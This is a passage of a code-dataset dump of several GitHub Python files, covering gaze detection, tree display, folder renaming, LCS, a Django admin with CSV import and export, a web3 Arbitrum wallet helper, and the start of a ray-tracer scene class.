= bottom_point_y\n elif ratio > 0.43 and ratio <= 0.57:\n iris_pos = 'CENTER'\n x1 = int(w/3 + x_size)\n y1 = top_point_y\n x2 = int(2*w/3 - x_size)\n y2 = bottom_point_y\n else:\n iris_pos = 'LEFT'\n x1 = int(2*w/3 + x_size)\n y1 = 
top_point_y\n                x2 = int(w - x_border)\n                y2 = bottom_point_y\n            \n            cv2.rectangle(frame2,(x1,y1),(x2,y2),(0,0,255),5) \n\n        out1.write(frame1)\n        out2.write(frame2)\n        cv2.imshow('Face Camera', frame1)\n        cv2.imshow('Front Camera', frame2)\n        k = cv2.waitKey(1)\n        if k == 27:\n            break\nout1.release()\nout2.release()\nface_camera.release()\nfront_camera.release()\ncv2.destroyAllWindows()","repo_name":"bilalahmedm/mediapipe-gaze-detection","sub_path":"part2-gaze-detection.py","file_name":"part2-gaze-detection.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74905936786","text":"from Node import Node\r\n\r\nroot = Node(value=\"rrrbggg\", cost=0, level=0)\r\n\r\ntree = {} # for node traversal\r\nlevelValues = {} # for tree display purposes, needed values so legible to human readers\r\nlevelCount = {0: 1} # holds the number of nodes at each level\r\nneedToAdd = [] # used as queue to determine next node to evaluate\r\n\r\n\r\ndef createLevel(node):\r\n    if not (node in tree):\r\n        tree[node] = node.getChildren()\r\n    count = 0\r\n    for node in tree[node]:\r\n        count += 1\r\n        needToAdd.append(node)\r\n        # count each child exactly once at its level (adding the running total\r\n        # here would over-count: 1 + 2 + 3 + ... instead of the child count)\r\n        if node.level in levelCount:\r\n            levelCount[node.level] += 1\r\n        else:\r\n            levelCount[node.level] = 1\r\n\r\n\r\nneedToAdd.append(root)\r\n\r\nwhile len(needToAdd) > 0:\r\n    createLevel(needToAdd.pop(0))\r\n\r\nfor x in tree:\r\n    if x.level in levelValues:\r\n        levelValues[x.level].append(x.value)\r\n    else:\r\n        levelValues[x.level] = [x.value]\r\n\r\n\r\nprint(levelCount)\r\ni = 0\r\nfor x in levelValues:\r\n    print(\"Level \" + str(i) + \": \" + str(levelValues[x]))\r\n    i += 1\r\n\r\nfor x in tree:\r\n    tmparr = []\r\n    for y in tree[x]:\r\n        tmparr.append(y.value)\r\n    if (len(tmparr) > 0):\r\n        print(\"Parent at Level \"+str(x.level)+\" : \"+x.value)\r\n        print(\"Children: \"+str(tmparr))\r\n\r\n\r\n","repo_name":"Dalton8804/AIHW3","sub_path":"TreeDisplay.py","file_name":"TreeDisplay.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28557624895","text":"\n'''\nThe files are organized as follows:\ntop-level folder (the group folder)\n    second-level folder (a person folder, e.g. \"哈哈哈\")\n    second-level folder\n        PDF file\n        PDF file\n\n1. Rename every second-level folder: \"哈哈哈\" --> \"哈哈哈-1\", where \"1\" is the group folder's name\n'''\n\n# Import the os module\nimport os\n# Get the path of the folder that holds all the subfolders from the user\ninput_path = input(\"Enter the path of the folder that contains all the subfolders: \")\n# Get the name of the input folder\ninput_name = os.path.basename(input_path)\n# Iterate over all subfolders of the input folder\nfor folder in os.listdir(input_path):\n    # Build the subfolder's path\n    folder_path = os.path.join(input_path, folder)\n    # Check that it is a folder\n    if os.path.isdir(folder_path):\n        # Build the new name: the old name plus \"-\" and the input folder's name\n        new_name = folder + \"-\" + input_name\n        # Build the new folder path\n        new_path = os.path.join(input_path, new_name)\n        # Rename the folder\n        os.rename(folder_path, new_path)\n        # Print a message recording the rename\n        print(f\"In {input_name}: renamed {folder} to {new_name}\")","repo_name":"gjingbaby/myCode","sub_path":"lf/V1/group_rename_folder.py","file_name":"group_rename_folder.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13755138705","text":"import sys\n\n\ndef solve():\n    input = sys.stdin.readline\n\n    str1 = str(input().strip())\n    str2 = str(input().strip())\n    N = len(str1)\n    M = len(str2)\n    dp = [[0 for _ in range(M + 1)] for _ in range(N + 1)]\n    check = [[0 for _ in range(M + 1)] for _ in range(N + 1)]\n\n    for i in range(0, N):\n        for j in range(0, M):\n            if (str1[i] == str2[j]):\n                dp[i + 1][j + 1] = dp[i][j] + 1\n                check[i][j] = 1\n            else:\n                dp[i + 1][j + 1] = max(dp[i][j + 1], dp[i + 1][j])\n\n    x = N\n    y = M\n    ans = []\n
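    # Walk the dp/check tables backwards from (N, M) to recover one LCS (added note).\n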
    while (1):\n        if (dp[x][y] == 0):\n            break\n        if (check[x - 1][y - 1] == 1):\n            ans.append(str1[x - 1])\n            x -= 1\n            y -= 1\n        else:\n            if (dp[x - 1][y] > dp[x][y - 1]):\n                x -= 1\n            else:\n                y -= 1\n    ans.reverse()\n    print(dp[N][M])\n    print(''.join(ans))\n\n\nsolve()\n","repo_name":"Daejjyu/Algorithm","sub_path":"Jungle/Week4_Dp, Greedy/99_9252_LCS2.py","file_name":"99_9252_LCS2.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"14235534963","text":"import io\n\nfrom daterangefilter.filters import DateRangeFilter\nfrom django.contrib import admin, messages\nfrom django.contrib.admin import ModelAdmin\nfrom django.contrib.admin.utils import model_ngettext\nfrom django.core.exceptions import PermissionDenied, ValidationError\nfrom django import forms\nfrom django.shortcuts import redirect, render\nfrom django.urls import path\nfrom django.utils.datetime_safe import datetime\n\nfrom archive_api.models import DataSet, DataSetDownloadLog, MeasurementVariable, Person, Plot, Site\n\n\nclass CsvImportForm(forms.Form):\n    csv_file = forms.FileField()\n\n\n@admin.register(MeasurementVariable)\nclass MeasurementVariableAdmin(ModelAdmin):\n    list_display = ('name',)\n\n\n@admin.register(Person)\nclass PersonAdmin(ModelAdmin):\n\n    change_list_template = \"entities/persons_change_list.html\"\n    list_display = ('first_name', 'last_name', 'institution_affiliation','email', 'orcid')\n    actions = ('download_csv',)\n\n    def get_urls(self):\n        \"\"\"\n        Extends ancestor by adding the 'update-orcids/' path to the URLs returned for this view\n        :return:\n        \"\"\"\n        urls = super().get_urls()\n        my_urls = [\n            path('update-orcids/', self.update_orcids),\n        ]\n        return my_urls + urls\n\n    def update_orcids(self, request, ):\n        \"\"\" Allow users to update orcids\"\"\"\n\n        import csv\n        expected_headers = {'first_name', 'last_name', 'institution_affiliation', 'email', 'orcid'}\n\n        # Only allow POST method\n        if request.method == \"POST\":\n            csv_file = request.FILES[\"csv_file\"]\n\n            # Fail if not a CSV file\n            if csv_file.content_type == 'text/csv':\n\n                # The uploaded file is a BytesIO and the csv reader needs a string\n                file_wrapper = io.TextIOWrapper(csv_file.file, encoding='utf-8')\n\n                header = None\n                updated_count = 0\n                reader = csv.reader(file_wrapper)\n                for row in reader:\n                    if not header:\n                        header = row\n                        if expected_headers.difference(set(header)):\n                            self.message_user(request, f\"Cancelling update. Your header row is missing: {expected_headers.difference(set(header))}\")\n                            break\n                    else:\n                        if len(header) != len(row):\n                            self.message_user(request,\n                                              f\"Cancelling update. Data row is invalid: {row}\")\n                            break\n                        else:\n                            result_dict = dict(zip(header, row))\n                            # Create Person objects from passed in data\n\n                            try:\n                                # Find the person record.\n                                # If first_name, last_name, institution and email are not matched,\n                                # no records are updated.\n                                person = Person.objects.get(first_name=result_dict['first_name'],\n                                                            last_name=result_dict['last_name'],\n                                                            institution_affiliation=result_dict[\n                                                                'institution_affiliation'],\n                                                            email=result_dict['email'])\n\n                                # Assign the orcid. 
We are not checking if the ORCiD exists or\n # is being changed.\n person.orcid = result_dict['orcid']\n\n # Full clean forces validation\n person.full_clean()\n person.save()\n updated_count += 1\n except Person.DoesNotExist:\n self.message_user(request, f\"NOT FOUND {list(result_dict.values())}\", level=messages.WARNING)\n except ValidationError as e:\n # Do something based on the errors contained in e.message_dict.\n # Display them to a user, or handle them programmatically.\n for msg in e.messages:\n self.message_user(request, f\"{msg} {list(result_dict.values())}\", level=messages.ERROR)\n\n self.message_user(request, f\"{updated_count} records found and were updated.\",\n level=updated_count and messages.INFO or messages.WARNING)\n\n else:\n self.message_user(request, \"File must be text/csv. Your csv file has NOT been imported\")\n return redirect(\"..\")\n\n form = CsvImportForm()\n payload = {\"form\": form}\n return render(\n request, \"admin/csv_form.html\", payload\n )\n\n def download_csv(self, request, queryset):\n \"\"\"\n Allow users to download the selected records\n\n :param request:\n :param queryset:\n :return:\n \"\"\"\n import csv\n from django.http import HttpResponse\n import io\n\n f = io.StringIO()\n writer = csv.writer(f)\n writer.writerow(['first_name', 'last_name', 'institution_affiliation', 'email', 'orcid'])\n\n for row in queryset:\n writer.writerow([row.first_name, row.last_name, row.institution_affiliation, row.email,\n row.orcid\n ])\n\n f.seek(0)\n response = HttpResponse(f, content_type='text/csv')\n current_date = datetime.now().strftime(\"%Y%m%dT%H%M\")\n response['Content-Disposition'] = f'attachment; filename=download_ngeet_people_{current_date}.csv'\n return response\n\n download_csv.short_description = \"Download CSV file for selected people\"\n\n\n\n@admin.register(Plot)\nclass PlotAdmin(ModelAdmin):\n list_display = ('plot_id', 'description',)\n\n\n@admin.register(Site)\nclass SiteAdmin(ModelAdmin):\n list_display = ('site_id', 'name', 'description',)\n\n\n@admin.register(DataSet)\nclass DraftDataSetAdmin(ModelAdmin):\n\n actions = (\"mark_as_deleted\",)\n list_display = ('ngt_id', 'version','name', 'created_by', 'created_date','modified_by','modified_date',)\n readonly_fields = ('ngt_id', 'version', 'name', 'created_by', 'created_date','modified_by','modified_date',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Override the parent method in order to remove display links\n that navigate to show info page.\n :param args:\n :param kwargs:\n \"\"\"\n super(self.__class__, self).__init__(*args, **kwargs)\n self.list_display_links = None # no display links\n\n # This will affect the Title of the page on in the Admin site\n self.model._meta.verbose_name = 'Draft data set'\n self.model._meta.verbose_name_plural = 'Draft data sets'\n\n def get_actions(self, request):\n \"\"\"Overrides parent. Removed the delete selected action\"\"\"\n actions = super(self.__class__, self).get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n def get_queryset(self, request):\n \"\"\"\n Returns a QuerySet of all DRAFT DataSets\n \"\"\"\n qs = super(DraftDataSetAdmin,self).get_queryset(request)\n return qs.filter(status=DataSet.STATUS_DRAFT)\n\n def has_add_permission(self, request):\n \"\"\"\n Disallow add through the admin interface. 
These records\n        should only be created in the main site\n\n        :param request:\n        :return: False\n        \"\"\"\n        return False\n\n    def mark_as_deleted(self, request, queryset):\n        \"\"\"\n        Mark the DRAFT Datasets as deleted. Datasets marked\n        as deleted will not show up in the Archive Service\n\n        :param request: The current http request\n        :param queryset: the selected objects to mark deleted\n        :return: None\n        \"\"\"\n\n        # Check that the user has delete permission for the actual model\n        if not self.has_delete_permission(request):\n            raise PermissionDenied\n\n        n = queryset.count()\n        if n:\n            for obj in queryset:\n                # We just want to mark deleted NOT physically delete\n                obj.status = DataSet.STATUS_DELETED\n                obj.save()\n\n            self.message_user(request,\n                              \"Successfully marked %(count)d %(items)s as DELETED.\" % {\n                                  \"count\": n,\n                                  \"items\": model_ngettext(self.opts, n)\n                              }, messages.SUCCESS)\n        # Return None to display the change list page again.\n        return None\n\n    mark_as_deleted.short_description = \"Mark draft data sets as DELETED\"\n\n\n@admin.register(DataSetDownloadLog)\nclass DataSetDownloadLogAdmin(ModelAdmin):\n    \"\"\"\n    This Admin interface allows users to search by date range and user. The resulting items\n    in the list may be downloaded to a CSV file\n    \"\"\"\n    list_filter = (('datetime',DateRangeFilter),'user',)\n    actions = ('download_csv',)\n    list_display = ('datetime', 'user_name', 'dataset_status', 'dataset', 'request_url',)\n    readonly_fields = ('datetime', 'user', 'dataset_status', 'dataset', 'request_url', 'ip_address')\n\n    fieldsets = [\n        (None, {'fields': ()}),\n    ]\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"\n        Override the parent method in order to remove display links\n        that navigate to show info page.\n        :param args:\n        :param kwargs:\n        \"\"\"\n        super(self.__class__, self).__init__(*args, **kwargs)\n        self.list_display_links = None  # no display links\n\n    def get_actions(self, request):\n        \"\"\"Overrides parent. Removes the delete selected action\"\"\"\n        actions = super(self.__class__, self).get_actions(request)\n        if 'delete_selected' in actions:\n            del actions['delete_selected']\n        return actions\n\n    def has_add_permission(self, request):\n        \"\"\"\n        Disallow add through the admin interface. These records\n        should only be created when a DataSet archive file is downloaded\n        :param request:\n        :return:\n        \"\"\"\n        return False\n\n    def has_delete_permission(self, request, obj=None):\n        \"\"\"\n        Disallow delete from anywhere in the admin interface. 
These records are\n        never to be deleted.\n\n        :param request:\n        :param obj:\n        :return:\n        \"\"\"\n        return False\n\n    def user_name(self, obj):\n        \"\"\"\n        Format the user name with full name and email address.\n        :param obj:\n        :return:\n        \"\"\"\n        return \"{} <{}>\".format(obj.user.get_full_name(), obj.user.email)\n\n    def download_csv(self, request, queryset):\n        \"\"\"\n        Allow users to download the selected records\n\n        :param request:\n        :param queryset:\n        :return:\n        \"\"\"\n        import csv\n        from django.http import HttpResponse\n        import io\n\n        f = io.StringIO()\n        writer = csv.writer(f)\n        writer.writerow([\"datetime\", \"user_name\", \"dataset_status\", 'dataset_name', \"ip_address\", \"request_url\"])\n\n        for row in queryset:\n            writer.writerow([row.datetime, self.user_name(row),row.get_dataset_status_display(),\n                             str(row.dataset), row.ip_address, row.request_url\n                             ])\n\n        f.seek(0)\n        response = HttpResponse(f, content_type='text/csv')\n        response['Content-Disposition'] = 'attachment; filename=download_log.csv'\n        return response\n\n    download_csv.short_description = \"Download CSV file for selected download activity.\"\n\n\n","repo_name":"heycatwonton/ngt-archive","sub_path":"archive_api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":11902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"1046464894","text":"import config\n\nimport time\nfrom time import sleep\nimport random\nimport datetime\nimport requests\nimport eth_abi\n\nfrom loguru import logger\nfrom decimal import Decimal\nfrom pycoingecko import CoinGeckoAPI\nfrom web3 import Web3, HTTPProvider\n\n\nclass ArbitrumCore:\n    def __init__(self, run: str, network: str) -> None:\n        # FOR PROD\n        if (\n            run\n            == \"Special for https://t.me/importweb3, creator - https://t.me/vladweat\"\n        ):\n            logger.info(f\"{run}\")\n            pass\n        else:\n            logger.error(f\"Fatal error in script. FO!\")\n            raise SystemExit(1)\n\n        self._web3 = self._set_web3_rpc(network)\n        self._wallets_dict = self.__create_wallets_dict()\n        self._len_wallets_dict = self.__get_len_wallets_dict()\n\n    def _set_web3_rpc(self, network: str) -> Web3:\n        \"\"\"RPC setter\n\n        Args:\n            network (str): string with name of network\n\n        Raises:\n            SystemExit: if wrong network string input\n\n        Returns:\n            Web3: Web3 class\n        \"\"\"\n        from web3.middleware import geth_poa_middleware\n\n        if network == \"arbitrum\":\n            return Web3(HTTPProvider(config.ARBITRUM_RPC))\n        elif network == \"mainnet\":\n            return Web3(HTTPProvider(config.MAINNET_RPC))\n        elif network == \"optimism\":\n            return Web3(HTTPProvider(config.OPTIMISM_RPC))\n        else:\n            logger.error(f\"Wrong network RPC. 
Change it!\")\n raise SystemExit(1)\n\n def _change_network_rpc(self, network: str) -> None:\n \"\"\"Change network rpc by string\n\n Args:\n network (str): string with name of network\n \"\"\"\n self._web3 = self._set_web3_rpc(network)\n\n def _check_connection(self) -> bool:\n \"\"\"Check connection to RPC URL\n\n Returns:\n bool: connection status\n \"\"\"\n try:\n return self._web3.isConnected()\n except Exception as e:\n logger.error(e)\n\n def _get_private_keys(self) -> list:\n \"\"\"Return list of private keys from wallets.txt\n\n Returns:\n list: keys\n \"\"\"\n try:\n with open(\"private_keys.txt\", \"r\") as file:\n keys = file.read().splitlines()\n\n return keys\n\n except Exception as e:\n logger.error(e)\n\n def _check_private_keys(self) -> None:\n \"\"\"Checking private keys for validity\n\n Raises:\n SystemExit: if 'Non-hexadecimal digit found' raised\n \"\"\"\n if None in self._wallets_dict.values():\n logger.error(f\"Fatal error in script. Change keys above!\")\n raise SystemExit(1)\n else:\n logger.success(f\"Private key verification passed!\")\n\n def _get_address(self, private_key: str = None) -> str:\n \"\"\"Return address from _wallets_dict[private_key]\n\n Args:\n private_key (str, optional): private key. Defaults to None.\n\n Returns:\n str: address from _wallets_dict[private_key]\n \"\"\"\n try:\n address = self._wallets_dict.get(private_key)\n return address\n except Exception as e:\n logger.error(e)\n\n def _get_balance(self, private_key: str = None) -> float:\n \"\"\"Get balance of address generated from _get_address(private_key)\n\n Args:\n private_key (str, optional): private key. Defaults to None.\n\n Returns:\n float: address balance\n \"\"\"\n try:\n address = self._get_address(private_key)\n # balance = self._convert_from_ether_format(\n # self._web3.eth.get_balance(address)\n # )\n balance = self._web3.eth.get_balance(address)\n return balance\n except Exception as e:\n logger.error(e)\n\n def _get_nonce(self, private_key: str) -> int:\n \"\"\"Return nonce of address from private_key\n\n Args:\n private_key (str): private key\n\n Returns:\n int: nonce\n \"\"\"\n try:\n address = self.__get_address(private_key)\n nonce = self._web3.eth.get_transaction_count(address)\n return nonce\n except Exception as e:\n logger.error(e)\n\n def _convert_from_ether_format(self, num: int = None) -> float:\n \"\"\"Convert Wei to Ether format\n 100000000000000000000 -> 100\n\n Args:\n num (integer): wei format integer\n\n Returns:\n float: _description_\n \"\"\"\n try:\n ether_format = self._web3.fromWei(num, \"ether\")\n return ether_format\n except Exception as e:\n logger.error(e)\n\n def _convert_to_ether_format(self, num: float = None) -> int:\n \"\"\"Convert Ether to Wei format\n 100 -> 100000000000000000000\n Args:\n num (float): ether format integer\n\n Returns:\n int: _description_\n \"\"\"\n try:\n wei_format = self._web3.toWei(Decimal(num), \"ether\")\n return wei_format\n except Exception as e:\n logger.error(e)\n\n def _convert_from_mwei_format(self, num: int = None) -> float:\n \"\"\"Convert Wei to Mwei format\n 1000000 -> 1\n Args:\n num (integer): wei format integer\n\n Returns:\n float: _description_\n \"\"\"\n try:\n ether_format = self._web3.fromWei(num, \"mwei\")\n return ether_format\n except Exception as e:\n logger.error(e)\n\n def _convert_to_mwei_format(self, num: float = None) -> int:\n \"\"\"Convert Mwei to Wei format\n 1 -> 1000000\n Args:\n num (float): ether format integer\n\n Returns:\n int: _description_\n \"\"\"\n try:\n wei_format = 
self._web3.toWei(Decimal(num), \"mwei\")\n            return wei_format\n        except Exception as e:\n            logger.error(e)\n\n    def _get_checksum_address(self, address: str) -> str:\n        \"\"\"Return toChecksumAddress(address)\n\n        Args:\n            address (str): address\n\n        Returns:\n            str: toChecksumAddress(address)\n        \"\"\"\n        try:\n            checksum_address = self._web3.toChecksumAddress(address)\n            return checksum_address\n        except Exception as e:\n            logger.error(e)\n\n    def _sign_transaction(self, transaction, private_key: str) -> dict:\n        \"\"\"Wrapper for web.eth.account.sign_transaction\n\n        Args:\n            transaction (_type_): transaction.method().buildTransaction()\n            private_key (str): private key\n\n        Returns:\n            signed_tx: web3.eth.account.sign_transaction()\n        \"\"\"\n        try:\n            signed_tx = self._web3.eth.account.sign_transaction(\n                transaction, private_key\n            )\n            return signed_tx\n        except Exception as e:\n            logger.error(e)\n\n    def _send_raw_transaction(self, sign_txn: dict) -> str:\n        \"\"\"Wrapper for web3.eth.send_raw_transaction\n\n        Args:\n            sign_txn (_type_): sign_txn\n\n        Returns:\n            raw_tx_hash: raw_tx_hash\n        \"\"\"\n        try:\n            raw_tx_hash = self._web3.eth.send_raw_transaction(sign_txn.rawTransaction)\n            return raw_tx_hash\n        except Exception as e:\n            logger.error(e)\n\n    def _get_tx_hash(self, raw_tx_hash: str) -> str:\n        \"\"\"Wrapper for web3.toHex\n\n        Args:\n            raw_tx_hash (_type_): raw_tx_hash\n\n        Returns:\n            tx_hash: tx_hash\n        \"\"\"\n        try:\n            tx_hash = self._web3.toHex(raw_tx_hash)\n            return tx_hash\n        except Exception as e:\n            logger.error(e)\n\n    def __create_wallets_dict(self) -> dict:\n        \"\"\"Create dict with key:address pairs\n\n        Returns:\n            dict: dict{ private_key: 'address' }\n        \"\"\"\n        try:\n            private_keys = self._get_private_keys()\n            wallets_dict = {}\n\n            for key in private_keys:\n                wallets_dict[key] = self.__get_address(key)\n\n            return wallets_dict\n        except Exception as e:\n            logger.error(e)\n\n    def __get_len_wallets_dict(self) -> int:\n        \"\"\"Return length of self._wallets_dict\n\n        Returns:\n            int: len of self._wallets_dict\n        \"\"\"\n        return len(self._wallets_dict)\n\n    def __get_address(self, private_key: str = None) -> str:\n        \"\"\"Return address generated from private_key\n\n        Args:\n            private_key (str, optional): private key. Defaults to None.\n\n        Returns:\n            str: address generated with web3.eth.account.from_key\n        \"\"\"\n        if type(private_key) == str:\n            try:\n                account = self._web3.eth.account.from_key(private_key)\n                return account.address\n\n            except Exception as e:\n                logger.error(f'{e}: Change key \"{private_key}\"')\n        else:\n            logger.error(\n                f\"Can't get address from private key. Private key format is {type(private_key)}, must be <class 'str'>!\"\n            )\n\n    def _wait_for_transaction_receipt(self, tx_hash) -> bool:\n        \"\"\"Wrapper for web3.eth.waitForTransactionReceipt()\n\n        Args:\n            tx_hash (str): hash from scan\n\n        Returns:\n            bool: bool\n        \"\"\"\n        while True:\n            try:\n                tx_status = self._web3.eth.waitForTransactionReceipt(tx_hash).status\n                if tx_status == 1:\n                    logger.success(f\"Tx {tx_hash} CONFIRMED\")\n                    return True\n                else:\n                    sleep(3)\n            except Exception as e:\n                logger.error(e)\n\n    def _is_encodable(self, value, value_name, value_type) -> str:\n        _value = value\n        _value_name = str(value_name)\n        _type = str(value_type)\n        _is_encodable_str = (\n            f\"{_value_name} is {_type}? 
{self._web3.is_encodable(_type, _value)}\"\n        )\n        return _is_encodable_str\n\n    def _add_random_delay(self, min, max) -> bool:\n        \"\"\"Add random delay in [min, max]\n\n        Args:\n            min (int): min sec\n            max (int): max sec\n\n        Returns:\n            bool: bool\n        \"\"\"\n        time.sleep(random.randint(min, max))\n        return True\n\n    def _get_chain_id(self) -> int:\n        \"\"\"Wrapper for web3.eth.chain_id\n\n        Returns:\n            int: chain id\n        \"\"\"\n        return self._web3.eth.chain_id\n\n    def _get_gas_price(self) -> int:\n        \"\"\"Wrapper for web3.eth.gas_price\n\n        Returns:\n            int: gas price\n        \"\"\"\n        return self._web3.eth.gas_price\n\n    def _get_gas_limit(self, from_address: str, to_address: str, value: int) -> int:\n        \"\"\"Wrapper for web3.eth.estimate_gas\n\n        Args:\n            from_address (str): transaction.from\n            to_address (str): transaction.to\n            value (int): transaction.value\n\n        Returns:\n            int: gas limit\n        \"\"\"\n        gas_limit = self._web3.eth.estimate_gas(\n            {\"to\": to_address, \"from\": from_address, \"value\": value}\n        )\n        return gas_limit\n\n    def _build_tx_param(\n        self, from_private_key: str, to_address: str, value: int\n    ) -> dict:\n        \"\"\"Build transaction parameters\n\n        Args:\n            from_private_key (str): private key\n            to_address (str): transaction.to\n            value (int): transaction.value\n\n        Returns:\n            dict: transaction_param\n        \"\"\"\n        address = self._get_checksum_address(self._get_address(from_private_key))\n        _to_address = self._get_checksum_address(to_address)\n\n        estimate = self._web3.eth.estimate_gas(\n            {\"to\": _to_address, \"from\": address, \"value\": value}\n        )\n        gas_limit = estimate\n\n        transaction_param = {\n            \"chainId\": self._get_chain_id(),\n            \"from\": address,\n            \"nonce\": self._get_nonce(from_private_key),\n            \"to\": _to_address,\n            \"value\": value,\n            \"gas\": gas_limit,\n            \"maxPriorityFeePerGas\": self._web3.toWei(5, \"gwei\"),\n            \"maxFeePerGas\": self._web3.toWei(10, \"gwei\"),\n            # \"gasPrice\": self._get_gas_price(),\n            \"type\": \"0x2\",\n        }\n\n        return transaction_param\n\n    def _build_contract_tx_param(self, from_private_key: str, value: int) -> dict:\n        \"\"\"Build transaction parameters to contract\n\n        Args:\n            from_private_key (str): private key\n            value (int): transaction.value\n\n        Returns:\n            dict: transaction_param\n        \"\"\"\n        address = self._get_checksum_address(self._get_address(from_private_key))\n\n        transaction_param = {\n            \"chainId\": self._get_chain_id(),\n            \"from\": address,\n            \"nonce\": self._get_nonce(from_private_key),\n            \"value\": value,\n            \"type\": \"0x2\",\n            # \"gasPrice\": self._get_gas_price(),\n        }\n\n        return transaction_param\n\n    def _sign_send_get_tx_hash(self, transaction: dict, private_key: str) -> str:\n        \"\"\"Wrapper for sign_transaction / send_raw_transaction / get_tx_hash\n\n        Args:\n            transaction (dict): transaction_param\n            private_key (str): private_key\n\n        Returns:\n            str: transaction hash\n        \"\"\"\n        signed_transaction = self._sign_transaction(transaction, private_key)\n        raw_tx_hash = self._send_raw_transaction(signed_transaction)\n        tx_hash = self._get_tx_hash(raw_tx_hash)\n        return tx_hash\n\n    def _get_token_price(self, coingecko_token_id: str) -> float:\n        \"\"\"Return USD value of coingecko_token_id\n\n        Args:\n            coingecko_token_id (str): token id from https://www.coingecko.com/\n\n        Returns:\n            float: USD value of token\n        \"\"\"\n        try:\n            cg = CoinGeckoAPI()\n            token_price_req = cg.get_price(ids=coingecko_token_id, vs_currencies=\"usd\")\n            token_price = float(token_price_req[f\"{coingecko_token_id}\"][\"usd\"])\n            return token_price\n\n        except Exception as e:\n            logger.error(e)\n\n    def 
_get_transaction_receipt(self, tx_hash: str) -> dict:\n        \"\"\"Wrapper for web3.eth.get_transaction()\n\n        Args:\n            tx_hash (str): transaction hash\n\n        Returns:\n            dict: transaction receipt\n        \"\"\"\n        transaction = self._web3.eth.get_transaction(tx_hash)\n        return transaction\n\n    def _get_fee_value(self, tx_hash: str) -> int:\n        \"\"\"Get fee value of transaction\n\n        Args:\n            tx_hash (str): transaction hash\n\n        Returns:\n            int: gas value\n        \"\"\"\n        transaction = self._get_transaction_receipt(tx_hash)\n        gas_limit = transaction[\"gas\"]\n        gas_price = transaction[\"gasPrice\"]\n        fee_value = gas_limit * self._convert_from_ether_format(gas_price)\n        return fee_value\n\n    def _get_fee_cost(self, tx_hash: str) -> float:\n        \"\"\"Get fee cost from fee value\n\n        Args:\n            tx_hash (str): transaction hash\n\n        Returns:\n            float: fee in usdc\n        \"\"\"\n        fee_value = self._get_fee_value(tx_hash)\n        fee_cost = self._get_token_price(\"ethereum\") * float(fee_value)\n        return fee_cost\n","repo_name":"vladweat/cr_p_arbitrum_client","sub_path":"arbitrum_core.py","file_name":"arbitrum_core.py","file_ext":"py","file_size_in_byte":15308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"43032329278","text":"# Modules\nfrom PyRT_Common import *\nfrom abc import ABC, abstractmethod  # Abstract Base Class\nfrom math import tan\nimport numpy as np\n\n\n# -------------------------------------------------Scene class\nclass Scene:\n    def __init__(self):\n        self.camera = None\n        self.env_map = None  # not initialized\n        self.rendered_image = None\n        self.object_list = []  # object list\n        self.pointLights = []  # list of point light sources (for Phong Illumination)\n        self.i_a = None  # ambient lighting\n\n    def set_ambient(self, i_a):\n        self.i_a = i_a\n\n    # set camera\n    def set_camera(self, camera):\n        self.camera = camera\n        self.rendered_image = np.zeros((camera.height, camera.width, 3))\n\n    # set environment map\n    def set_environment_map(self, env_map_path):\n        self.env_map = EnvironmentMap(env_map_path)\n\n    # add objects\n    def add_object(self, new_object):\n        self.object_list.append(new_object)\n\n    # add point light sources\n    def add_point_light_sources(self, point_light):\n        self.pointLights.append(point_light)\n\n    def any_hit(self, ray):\n        # ASSIGNMENT 1.2: PUT YOUR CODE HERE\n        for i in range(len(self.object_list)):\n            this_hit = self.object_list[i].intersect(ray)\n            if this_hit.has_hit:  # Hit\n                return True\n        return False\n\n    def closest_hit(self, ray):\n        # find closest hit object, its distance, hit_point and normal\n        # scan through primitives in scene, find closest\n        hit_data = HitData()\n        for i in range(len(self.object_list)):\n            this_hit = self.object_list[i].intersect(ray)\n            if this_hit.has_hit:  # Hit\n                if this_hit.hit_distance < hit_data.hit_distance:  # Distance\n                    hit_data = this_hit\n                    hit_data.primitive_index = i\n        return hit_data\n\n    # save pixel array to file\n    def save_image(self, full_filename):\n        tonemapper = cv2.createTonemap(gamma=2.5)\n        image_nd_array_ldr = tonemapper.process(self.rendered_image.astype(np.single))\n        plt.imsave(full_filename + '.png', np.clip(image_nd_array_ldr, 0, 1))\n        np.save(full_filename, self.rendered_image)\n        cv2.imwrite(full_filename + '.hdr', cv2.cvtColor(self.rendered_image.astype('float32'), cv2.COLOR_RGB2BGR));\n        print(\"Image Saved\")\n\n    # set pixel value\n    def set_pixel(self, pixel_val, x, y):\n        # pixel_val.clamp(0.0, 1.0)\n        self.rendered_image[y, x, 0] = pixel_val.r\n        self.rendered_image[y, x, 1] = pixel_val.g\n        self.rendered_image[y, x, 2] = 
